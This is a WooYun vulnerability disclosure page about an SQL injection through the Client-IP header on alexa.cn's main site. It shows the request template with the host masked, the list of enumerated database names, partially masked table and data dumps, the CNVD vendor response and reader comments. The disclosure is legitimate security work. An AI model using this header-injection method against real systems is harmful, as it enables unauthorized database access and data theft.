当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153089

漏洞标题:Alexa.cn_www主站DBA注入

相关厂商:Alexa网站排名

漏洞作者: DloveJ

提交时间:2015-11-09 19:58

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

学学猪猪侠的标题
Alexa.cn_www主站DBA注入

详细说明:

GET / HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: checkdom=**.**.**.**%7C**.**.**.**%7C**.**.**.**%7C**.**.**.**%7C**.**.**.**
Client-IP:**.**.**.***


注入点:Client-IP

1.jpg


available databases [12]:
[*] alexa
[*] beta_tel
[*] icpdb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] tour2013
[*] whoisdb
[*] xj_cn_2014
[*] xj_cn_2014_bak
[*] xjzx


current database:    'alexa'


mask 区域 
*****e: a*****
*****----+--*****
*****    | E*****
*****----+--*****
*****    | 3*****
*****    | 2*****
*****    | 2*****
*****    | 7*****
*****    | 6*****
*****    | 5*****
*****    | 4*****
*****ory | 1*****
*****    | 1*****
*****    | 7*****
*****    | 6*****
*****cs  | 4*****
*****    | 1*****
*****----+--*****


dump一点点

mask 区域 
*****---------------------------*****
*****                           *****
*****---------------------------*****
*****||香港||Microsoft-IIS/6*****
*******.**.**||IANA||-||-||-    *****
*****CHINA.COM||IANA||-||-||-   *****
*******||香港||IIS||HTTP/1.1 2*****
*******||浙江省杭州市||Date:*****
*****|广东省广州市||DnionOS/*****
*****||北美地区||-||-||-     *****
*******.**||美国||nginx||HTTP/1*****
******||美国||                *****
*****^^斯达黎加||Date:        *****
*****||吉林省吉林市||Apache/2*****
******.**||香港||||HTTP/1.1   *****
******||世界||cloudflare-ng*****
******||广东省深圳市||Cdn   *****
*******||北京市||             *****
*****|浙江省杭州市||TornadoSe*****
******.**||上海市||Server:   *****
*****||广东省广州市||Date:   *****
*******.**||北京市||Apache||*****

漏洞证明:

修复方案:

版权声明:转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-20 14:59

厂商回复:

CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-09 19:59 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    mark

  2. 2015-11-09 20:00 | hecate ( 普通白帽子 | Rank:720 漏洞数:108 | ®高级安全工程师 | WooYun认证√)

    @大师兄 你怎么每次动作都这么快

  3. 2015-11-09 20:26 | DloveJ ( 普通白帽子 | Rank:1200 漏洞数:218 | Web安全测试培训 QQ269787775)

    @hecate 一直默默上乌云的人

  4. 2015-11-09 21:00 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    @hecate 不好意思啊,我近视,不坐前面看不清楚。

  5. 2015-11-09 22:10 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:1211 漏洞数:335 | 万年小厂王)

    http://wooyun.org/bugs/wooyun-2010-068696 不会是这个吧···

  6. 2015-11-09 22:42 | DloveJ ( 普通白帽子 | Rank:1200 漏洞数:218 | Web安全测试培训 QQ269787775)

    @天地不仁 以万物为刍狗 不是不是 话说http://wooyun.org/bugs/wooyun-2010-0141843&http://wooyun.org/bugs/wooyun-2010-068696这俩个注入点一样为嘛还能通过